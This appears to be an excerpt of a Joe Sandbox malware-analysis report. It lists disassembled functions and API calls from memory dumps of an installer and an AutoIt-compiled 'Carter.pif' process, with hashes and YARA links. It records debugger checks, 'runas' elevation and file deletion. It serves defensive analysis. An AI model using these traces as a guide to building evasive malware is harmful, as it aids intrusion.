Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Carter.pifPID: 5900, Parent PID: 7960COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	82

Executed Functions

Function 00A95240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
IsDebuggerPresent.KERNEL32 ref: 00A9527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

Part of subcall function 00A8BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A8BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00AD0B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD0B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B36D10), ref: 00AD0BE9
ShellExecuteW.SHELL32(00000000), ref: 00AD0BF0

Part of subcall function 00A9514C: GetSysColorBrush.USER32(0000000F), ref: 00A95156
Part of subcall function 00A9514C: LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
Part of subcall function 00A9514C: LoadIconW.USER32(00000063), ref: 00A9517C
Part of subcall function 00A9514C: LoadIconW.USER32(000000A4), ref: 00A9518E
Part of subcall function 00A9514C: LoadIconW.USER32(000000A2), ref: 00A951A0
Part of subcall function 00A9514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
Part of subcall function 00A9514C: RegisterClassExW.USER32(?), ref: 00A9521C

Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A9513E
Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A95147

Part of subcall function 00A959D3: _memset.LIBCMT ref: 00A959F9
Part of subcall function 00A959D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E

Strings

runas, xrefs: 00AD0BE4
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00AD0B28
AutoIt, xrefs: 00AD0B23

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 03ed5dda570f68d1267930eac6bbe5ad4e90f28a2d6b908da8b7f9e9c5c848cc
Instruction ID: e8e6f5b6e9fb942f630f8181ddf3142afaa8d697d5abbd515deda216aa4494b1
Opcode Fuzzy Hash: 03ed5dda570f68d1267930eac6bbe5ad4e90f28a2d6b908da8b7f9e9c5c848cc
Instruction Fuzzy Hash: 3151D331F48249AACF12BBB0DD56EEE7BF8AB06340F1041A5F451672A2DFF04A45DB61

Function 00AE3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4

Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED

FindFirstFileW.KERNEL32(?,?), ref: 00AE3D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00AE3E3E
MoveFileW.KERNEL32(?,?), ref: 00AE3E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AE3E6E
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00AE3E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00AE3EAC

Strings

\*.*, xrefs: 00AE3D41, 00AE3D4A, 00AE3D5F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
Instruction ID: a28d5492202e2e9f3c7797d07a58f4a66356aba9d15a2f9e6ca369363041c33b
Opcode Fuzzy Hash: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
Instruction Fuzzy Hash: 0E516F3290118EAACF15FBA1CA969EDB7B9AF15300F604165E442B7192EF316F09CB60

Function 00A95D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00A95D40

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

GetCurrentProcess.KERNEL32(?,00B10A18,00000000,00000000,?), ref: 00A95E07
IsWow64Process.KERNEL32(00000000), ref: 00A95E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00A95E54
FreeLibrary.KERNEL32(00000000), ref: 00A95E5F
GetSystemInfo.KERNEL32(00000000), ref: 00A95E90
GetSystemInfo.KERNEL32(00000000), ref: 00A95E9C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
Instruction ID: 3c24dc03dd3468ec0d0f384a6a8e13fea7210a64abde9ecfb2912f123df70c0d
Opcode Fuzzy Hash: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
Instruction Fuzzy Hash: 0591F531A4DBC0DECB32DB7884515AAFFF56F2A300B884A5ED0C793B01D631AA48C759

Function 00AE4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4

Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED

FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00AE40DD
FindClose.KERNEL32(00000000), ref: 00AE40F4
FindClose.KERNEL32(00000000), ref: 00AE40FD

Strings

\*.*, xrefs: 00AE404E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
Instruction ID: 888f0342082a9c605c41eec3fd1db383906d8d2ddbb4bd2acbfcb1fd27db5c68
Opcode Fuzzy Hash: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
Instruction Fuzzy Hash: 3F316B311183869BC601FF60C9958EFB7ECBE95304F444A2DF5E183191EB349A09CBA2

Function 00AE4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
Process32NextW.KERNEL32(00000000,?), ref: 00AE419B
CloseHandle.KERNEL32(00000000), ref: 00AE4245

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
Instruction ID: 809da9100080e913a2fea625fcfaa4f535d82724a54a2637d66787943de75e64
Opcode Fuzzy Hash: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
Instruction Fuzzy Hash: 5C3181712083429FD700EF55D885AEFBBF8AF99350F40092DF585C31A1EB719A49CB52

Function 00A8B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00A93740: CharUpperBuffW.USER32(?,00B471DC,00000002,?,00000000,00B471DC,?,00A853A5,?,?,?,?), ref: 00A9375D

_memmove.LIBCMT ref: 00A8B68A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: 65eecd56a639a1efcde3a9ebffe40ab1c91d6072f278fa6b850764ab9e2f3438
Instruction ID: 9c3aa79ecc67209427fff7130a390d0fe83b3e4967153dba67dd5366c1451fd1
Opcode Fuzzy Hash: 65eecd56a639a1efcde3a9ebffe40ab1c91d6072f278fa6b850764ab9e2f3438
